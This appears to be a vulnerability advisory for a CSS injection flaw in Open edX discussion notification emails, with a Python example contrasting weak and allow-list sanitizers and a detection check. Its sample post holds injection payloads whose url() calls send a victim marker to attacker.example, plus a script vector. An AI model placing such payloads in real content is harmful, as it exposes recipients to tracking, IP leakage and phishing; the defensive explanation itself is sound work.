CSS Injection Vulnerability in Open edX Platform by Open edX
CVE-2026-42857

4.6 MEDIUM

Key Information:

Vendor
Openedx

CVE Published:
11 May 2026

What is CVE-2026-42857?

The Open edX Platform contains a CSS injection vulnerability caused by inadequate sanitization of user-generated content embedded in discussion notification emails. The HTML sanitizer clean_thread_html_body() does not remove the tags through which CSS can be supplied, so an attacker who posts to a discussion can inject arbitrary CSS into the body of the notification email sent to other users. Because the sanitized body is then rendered with Django's |safe template filter, the injected markup reaches the recipient unescaped rather than entity-encoded. Email clients that honour the CSS can be made to fetch attacker-controlled URLs, which enables tracking of when the email is opened, exposure of the recipient's IP address, and phishing attacks on affected users. The issue is fixed in commit cddc25cd791bb78f76833896e4778f668861df12 (see Affected Version(s) below).
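The pattern described above, as an added illustration that is not Open edX's code: a deny-list sanitizer that strips only <script> (an assumed stand-in for the weak behaviour, not clean_thread_html_body() itself), an allow-list sanitizer that also removes style tags and style attributes (an assumed fix shape, not the project's patch), a post-sanitization check for CSS carriers, and a render helper that mimics what Django's |safe filter does versus default autoescaping. The sample post is constructed.

```python
"""Added illustration of CSS injection through an email-body sanitizer.

The two sanitizers and the render helper are stand-ins written for this
page; they are NOT Open edX's clean_thread_html_body() or its patch, and
the sample post is constructed.  They show why a sanitizer that leaves
<style> tags or style= attributes in place, followed by a |safe render,
lets post content drive the recipient's email client.
"""
import html
import re
from html.parser import HTMLParser

# Constructed sample post: harmless text plus three CSS/script vectors.
POST = (
    "<p>Great lecture!</p>"
    '<style>body{background:url("https://attacker.example/open?u=victim")}</style>'
    '<p style="background:url(https://attacker.example/p2)">More</p>'
    "<script>alert(1)</script>"
)


def naive_sanitize(fragment: str) -> str:
    """Deny-list sanitizer (assumed shape of the weak one): drops <script>
    but leaves <style> blocks and style= attributes untouched."""
    return re.sub(r"<script\b[^>]*>.*?</script>", "", fragment, flags=re.I | re.S)


# Allow-list used by the strict sanitizer.  <style> and <script> lose their
# inner text as well; any other unknown tag is dropped but its text is kept.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "code", "pre", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_WITH_CONTENT = {"style", "script"}


class _Allowlist(HTMLParser):
    def __init__(self) -> None:
        super().__init__()           # convert_charrefs=True: data arrives decoded
        self.out: list[str] = []
        self.skip = 0                # >0 while inside <style>/<script>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            # style= is never allowed; href only with an http(s) scheme.
            if name in ALLOWED_ATTRS.get(tag, ()) and value is not None:
                if name == "href" and not value.lower().startswith(("http://", "https://")):
                    continue
                kept += f' {name}="{html.escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))


def strict_sanitize(fragment: str) -> str:
    """Allow-list sanitizer: the assumed fixed shape, with CSS carriers removed."""
    p = _Allowlist()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


def css_indicators(fragment: str) -> list[str]:
    """Cheap post-sanitization check: names the CSS carriers still present."""
    checks = {
        "style tag": r"<style\b",
        "style attribute": r"\bstyle\s*=",
        "css url()": r"url\s*\(",
        "@import": r"@import\b",
    }
    return [name for name, pat in checks.items() if re.search(pat, fragment, re.I)]


def render_email(body: str, mark_safe: bool) -> str:
    """Mimics Django autoescaping: mark_safe=True is what |safe does (body
    inserted verbatim); False is the default, entity-escaped rendering."""
    payload = body if mark_safe else html.escape(body, quote=True)
    return f"<html><body>{payload}</body></html>"


if __name__ == "__main__":
    weak = naive_sanitize(POST)
    print("naive  :", css_indicators(weak))                   # CSS still reaches the mail
    print("strict :", css_indicators(strict_sanitize(POST)))  # nothing left
    print(render_email(strict_sanitize(POST), mark_safe=True))
```

Running css_indicators() over the sanitizer's output before the template is rendered is the check a practitioner would add to a test suite: the weak path still reports a style tag, a style attribute and a url() reference, so marking that output safe hands those fetches to the recipient's mail client; the allow-list path reports nothing, and only then is rendering it with |safe defensible.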

Affected Version(s)

openedx-platform < cddc25cd791bb78f76833896e4778f668861df12 (fixed in that commit)

openedx-platform >= sumac, < ulmo (named releases)

CVSS V3.1

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Score:
4.6
Severity:
MEDIUM
Confidentiality:
Low
Integrity:
Low
Availability:
None
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
Low
User Interaction:
Required
Scope:
Unchanged

Timeline

  • Vulnerability published: 11 May 2026

  • Vulnerability reserved